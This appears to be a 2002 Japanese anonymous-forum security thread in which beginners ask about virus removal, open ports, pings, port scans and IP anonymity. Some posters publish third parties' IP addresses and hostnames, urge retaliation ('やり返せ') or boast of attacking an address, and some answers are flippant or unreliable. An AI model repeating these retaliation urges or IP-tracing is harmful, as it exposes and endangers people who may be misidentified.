JS_Gigger.Aに感染してると言われました。
で、すぐにトレンドマイクロの記事を参考に駆除、autoexec.batやレジストリをいじりました。
その後再度オンラインスキャンして問題がなくなったと思っていたら、
数時間後念のため再度オンラインスキャンしてみると再び検知され、再度駆除。
NortonAntiVirusでは何も検知されないんですけど、これって駆除が完全にできていないのでしょうか？
よろしくお願いします。
（とりあえず現在シマンテックのオンラインスキャン中）

ＮＡＶの体験版って一回だけしかダウンロード出来ないんでしょうか？

>>849
はい

>>849
つまんない質問でごめんなさいです。。
ちゃんと買います。ありがとうございました。

YahooBB229152077.bbtec.net 210.197.80.39 43.229.152.77
某ＨＰ の荒らしの奴のなんですが、↑の有効活用法を教えて下さい。

>>847
レスありがとうございます。
早速施してみます。

>>852
足し算でもすれば？

>>844
氏ね

>>852
IP占い

>>843話題のアレですか。

YahooBB229152077.bbtec.net
210.197.80.39
43.229.152.77

Windows2000を使用しているのですが、なぜかFTPで使用する21番ポートが開いているようです。
どうすれば閉じる事が出来ますか？

>>859
HTTPのための80番ポートも開いてるんじゃん？　閉じなきゃ

>>860
え？　いや自宅サーバなどはやってないので、80番ポートは閉じてますよ。

>>852
yahooBBで串もささず荒らしする馬鹿がいるのかｗ
有効活用法は>>10
プロバイダにそのＩＰと荒らされた日時を連絡してみれ。

初心者におすすめの無料のファイアーウォールソフトはなんですか？

すみませんがどなたか教えてください。
ＡＤＳＬって基本的にダイヤルアップいらない常時接続ですよね？
で、ネットしてるうちにＱ２とかに自動接続されてしまうウィルスとかに
かかった場合ってやっぱりまずいんですか？

定期あげ

>>864
勿論（100%とは言わんが)

すみません初心者です、２chって匿名掲示板ですよね？
まともな論議していたんですが、
なんか大学から書き込んだら大学名がばれたみたいなんですが。。。
そういう技能を持った人っているんですか？
教えてください、怖いです・・・

>>867
ほぼ全員そうです

>>868
えっ！？そうだったんですか？マジで知りませんでした。
IPを読み取ったってことですよね？
そんな事できる人がそんなにいるなんて。。。

>>862
サンクスコ。早速後悔させたりますｗ

>>869
まあこれでも見て考えよ
http://www.ugtop.com/spill.shtml

>>871
ちょっとスキルがないんでわからない所もあったんですが、
危険なことがわかりました。
少し勉強しようと思います。ありがとうございました。

TELNETで相手のサーバに接続しようとしてるんですが接続拒否になったり
タイムアウトになります（相手はネットしてるのに）
何か解決方法はありませんか？

>>873
無い

>>873
相手の所でtelnet localhostする

>>873
お願いですからtelnetさせてくださいと相手にお願いする。

最近　62.212.99.76　に掲示板をあらされて困っているんですが、
掲示板に書き込みに来るほかの方にわからないように
警告をすることは可能でしょうか？

202.214.225.66
IIJ インターネット (IIJ Internet)
SUBA-006-A01 [サブアロケーション] 202.214.225.0
都市基盤整備公団 (Urban Development Corporation)
UDCNET [202.214.225.64 <-> 202.214.225.127] 202.214.225.64/26

Name: www.udc.go.jp
Address: 202.214.225.66
Aliases: 66.225.214.202.in-addr.arpa

なんどもPINGされるんですが

>>878
やり返せ

>>878
それだけでは実際に相手が手動でICMPメッセージを
送っているのか、IPスプーフィングによる踏み台攻撃
なのか分からない。キミ自身に対しての攻撃であると
断定できる程度のものであるなら考えても良いが、
そこらへんが分からないなら基本的にほっておくこと。

>866
レスありがとうございます。
ダイヤルアップみたら見事に（Ｑ２）ってのがあったんですが
何か対処法ってありますか？

これってどういう意味ですか。

http://www.geocities.co.jp/SiliconValley-Sunnyvale/7911/R3_temp.swf?inputStr=%82%B7%82%B0%82%A6%82%BC%81I%0D%0A%82%B1%82%CC%83N%83%89%83u%91S%88%F5%93%C1%83o%83%93%82%BE%81B

特バンねぇ・・・

　|￣￣￣￣￣￣￣￣|
　|　　次でボケて!!　　|
　|＿＿＿＿＿＿＿＿|
　　　 ∧∧ ||
　　　 ( ﾟдﾟ) ||
　　　 /　づΦ

ブルドックにしかり、
なんであなたたちインタネットのセキュリティ管理者
って危機管理意識が薄いんですか？

>>884
漏れの所は外注。

失礼しました。

>>881
PCにモデムがついてないか、ついてても
そこからモジュラーケーブルがつながってないなら
心配いらない。

いちおうこのスレも参考に。
http://pc.2ch.net/test/read.cgi/sec/1016106504/l50

じゃこれはどう？
http://www.metalflame.com/mm/lovely_mm.htm

>886
ありがとうございました。

62.212.99.76にデーモンおくってやりますた

887　　クッキーとかオフして見るとｵﾝﾃﾞｺﾏﾝﾄﾞ ｲﾝｽﾄｰﾙが出て中国文字表示サポート
とかインストールする要に出てくる。
これってインストールしても大丈夫？

218.***.***.**
219.***.***.**
で始まるアドレスのホストって何所らへんですか？
それとも地域は断定できないですか？

挑戦的な奴がスレを仕切っています。当てる方法はないものでしょうか。

863 ：m075197.ap.plala.or.jp ：02/08/25 21:48
>>860
私が誰だか当ててごらん。

ほっときなさいって（W

当てられない

>>891
APNIC管轄のIPアドレス
whoisぐらい自分でやれ

すみません、ネット初心者の者ですが、
最近、一度に３０回を超えるポートスキャンを受けてます。
whoisで調べてみたところ、so○tbank（某本会社）だったのですが、
これは企業の調査の場合があるのでしょうか？

ポートスキャンは現在犯罪にならないとお聞きしたのですが、
月に何回も来ているので不安になって、書き込みしました。
もし知っているかたがいらっしゃいましたら、よろしくお願い申し上げますm(__;)m。

>>896
本当にポートスキャンか？

ログ出せ

ネタ提供ヽ( ´∇｀)ノ

突然のメール失礼します。
本日連絡をしたのは、そちらからウイルス付きメールが毎日のように送られてきてい
るということを知らせるためです。
非常に迷惑しております。
ちなみに送られてきたウイルスはトロイの木馬型というもので、ＰＣが感染すると自
分の知らない内に
勝手に不特定多数の人にウイルスメールを送ってしまう非常にたちの悪いウイルスで
す。

このウイルスは常駐のウイルススキャンをしても感知しませんし、ウイルスバスター
を使っても駆除できないという特徴があります。
そちらは私が何を言ってるのかわからないとお思いでしょう。また多分そちらはウイ
ルスを送られた記憶はないでしょう。
私が言ってることが嘘でない事は、そちらのメールアドレスを知っているということ
で理解いただけると思います。
何とかしてもらえませんか？本当に困っているんです。
すぐに対処していただけなかったり、１週間以上このような状況が続けば、
私はあなたが利用しているインターネットプロバイダーに【ウイルスメールをばらま
く悪質な利用者】としてあなたの事を通報します。
すぐにウイルス対策を行ってください。私のようなウイルスメールの被害者をこれ以
上増やさないように努力してください。
なお、これ以上あなたのメールアドレスからウイルス付のメールが送られてくるよう
な事があれば、法的措置を考えさせて頂きます。
あなたの誠意ある対応を期待します。
よろしくおねがいします。

トロイは自己増殖しないってあたりから
慇懃無礼に小一時間問い詰めるようなメールを返信したれ

ネタとしては寂しいモノだったか(;＞_＜;)ビェェン

ちなみに、漏れのＰＣは未感染（ノートン先生でチェック済み）、
ＣＣで漏れを含む３２人に一斉送信しておりました。

とりあえず、己を疑えゴルァ！　と出しておきました。
アドレス帳に載っている相手から届いたように見せかけるモノもありますからね〜。

>>901時間帯が悪かっただけ
平均年齢高いからみんな寝ちゃってるだけと思われ

正直俺はこういうメールをもらってみたい
んで相手を思いっきり問い詰めたい

>>901
トロイとワームを履き違えてるクセに、やたら高圧的なメールだな。
こういうタイプは自分の間違いをなかなか認めないだろうから、
今後暫くそいつと不毛なやり取りする羽目になりそうだね…ご愁傷様。

返信遅れて申し訳ございませんm(__;)m

**日付： 2002/08/25 21:45:35
**アクセス元： 218.182.106.70
**攻撃方法： Port scan attempt

これが最新のものですが・・どうでしょうか？

>>904
YahooBB218182106070.bbtec.netだとさ

ノートンがBackdoor.Trojanを検出しました。感染ファイルは既に削除したの
ですが感染元が特定できません。
＞Backdoor.Trojan が実行されると \Windows または\Windows\System
フォルダに自分自身のコピーを作成します。
と説明書きにあるのですが、このコピーされるファイルのアイコンは
感染元のファイルとおなじになるのでしょうか？

バカＨＵＢ（リピータＨＵＢ）って、全ポートに同じ情報を垂れ流すのですよね？

それって、他ポートのＰＣやインターネットにさえ
全てのやり取りが流れていると言うこと？
（最近、ふと思い付いて、すごく気になってます）

ホームページにアクセスしただけで、その管理者にこちらのなんらかの
情報が見られたりしているのでしょうか？
例えば、この書き込みで２CHの管理者は私のプロバイダなどを知る事が
あるのでしょうか？
どなたか教えてくださ〜い。

>>907
>全ポートに同じ情報を
ハブの全ての穴というかポートにって意味かな？
とういか。これって電気の延長コードみたいな感じで。
A→リピーターハブ→B,C,D...の時。
BからC、もしくはCからWEBへのトラフィックの中身を、全てのノードに流してまいます。
だもので、LAN盗聴の防止のためにリピーターハブじゃなくてスイッチングハブ（宛先のMACアドレスをちゃんと認識してくれる）が推奨されてるのですら。

>ユキたん
IPアドレスは知られる可能性があります。
当然2chはログ取っているから、IPアドレスからプロバイダーや接続しているアクセスポイントは判明しまする。
というか、匿名掲示板でそれほど気を使う必要があるのでしょうか。
とりあえずMSネットワーク共有クライアント等が無効（もしくはPersonal Fire Wallが入っていて、ちゃんとまともに起動している）なら、心配無いって思いまする。

cheshire-catさん、分かり易い説明をどうもありがとうございます。
もう少し教えて下さい！掲示板の書き込みでこちらの情IPアドレスが
判明するのは分かりましたが、例えば書き込みなどせず、ただ掲示板を閲覧
しているだけでも、IPアドレスが知られてしまうのでしょうか？
変なこだわりの質問ですが、良ければ教えて下さい。

>>910アクセスログの解析してりゃわかる

実はダウンロードが出来なくなりました。
いろいろ調べた結果、ウイルスが原因じゃないかと思うんです。
ゴミ箱も空にできなくなってるし・・
ノートンアンチビールスでスキャンしたら、ブレートコードが改変されているみたいで・・・
ウイルスは出てきませんでした。
どうすればいいでしょうか？

>>ユキたん
>ただ掲示板を閲覧
>しているだけでも、IPアドレスが知られてしまうのでしょうか？

911の人が書いている通り、アクセスログ取ればわかりまする。

ネットの匿名性ってのは、個人で目一杯固めればある程度のレベルまではやり過ごせまするが。
ありがちな罠として、串というかプロキシ、これやると駄目駄目です。
串管理者は、君のフリーメールのパスを簡単に抜けますし。
また串利用者でもhttp以外のプロトコルに強制接続されたら、生IPアドレスは抜かれます。

大事なのは、生IPアドレス抜かれても何とかしよう、って事でして。
ほんとに大事なパソなら、MSネットワーク共有クライアントを使わず、管理ツールのサービスから無用なのを停止して、アンチウイルスソフトを使って有名所のトロイはブロックして、Personal Fire Wall使う、とか。

一番見落としがちで、アホくさいのは、地方のぁゃιぃプロバ使わないってこと。
こゆ所は被害者を装って、「IPアドレスがXXの人から荒らされたんですぅ！」って虚偽の通報されると、君の個人情報を簡単に漏らしたりする、住所とか電番までも。

串刺してるとフリーメールのパス抜かれるの？

ブレートコード

http://www.gakuiku.co.jp/edu/kokoro.jsp
※このページから送信なさる内容は暗号化されずにサーバーに届きます。
もし、お使いのブラウザがSSLに対応しているなら、より安全なセキュアサーバー上のフォームをご利用ください。
セキュアサーバーにログオンする際に情報ダイアログが表示される場合がありますが、問題はございませんので「はい」をクリックして進んでください。

セキュアという意味を理解していないと思われます。
信頼されていない機関による証明書が引き起こす問題について具体的に述べよ。（10点）

執拗にＰＩＮＧ打たれてて不気味…欝

ＩＰ： 203.141.136.3

[IPネットワークアドレス] 203.141.136.0-203.141.139.0
[ネットワーク名] INTERLINK
[組織名] 株式会社インターリンク
[Organization] Interlink Co.,Ltd.
[運用責任者] YT107JP
[技術連絡担当者] YN3315JP
[ネームサーバ] tegtan1.interlink.or.jp
[ネームサーバ] tegtan2.interlink.or.jp
[通知アドレス] [email protected]
[割当年月日] 1998/01/12
[最終更新] 2001/05/16 13:30:04 (JST)

http://muvc.net/jsweb/

すみません
セーフモードすら起動しなくなったので、再インストールしようと
思うのですが、消えたファイルたちは
富士通のファイナルデータで復元できるのでしょうか？

板違い

age

>>919
１．いかれたPCのHDDを取り外して、
別の安全なPCにデータドライブとしてつなぐ

２．別の安全なPCにインストールしたファイナルデータを
起動し、そこからいかれたPCのHDDを復元する

こうする方法が一番復元率が高いと思われる。

しまった。セキュ板じゃん、ここ。

接続状態を見ると付いたり消えたりしてて、勝手に送受信してるんですが
どうすれば良いでしょうか？
勝手に知らないアプリ（DateManagertとかPrecisionTimeとかいうもの）
がインストールされてて恐いです(;´Д`)
OSはWin2000で接続がTAでフレッツISDNです。

>>924
検索しろボケ

あげ

＞＞924
逝ってる意味がよくわ（以下略

リアルプレイヤーって、今でもスパイウェアの疑惑があるんですか？

>>928
ヲマエはFBI職員か？

あげ

脱サラしてサラリーマンしようと思っています

>>931
＞脱サラしてサラリーマンしようと思っています

いっぺん死ぬか？

>>932
反応すんなよ　タコが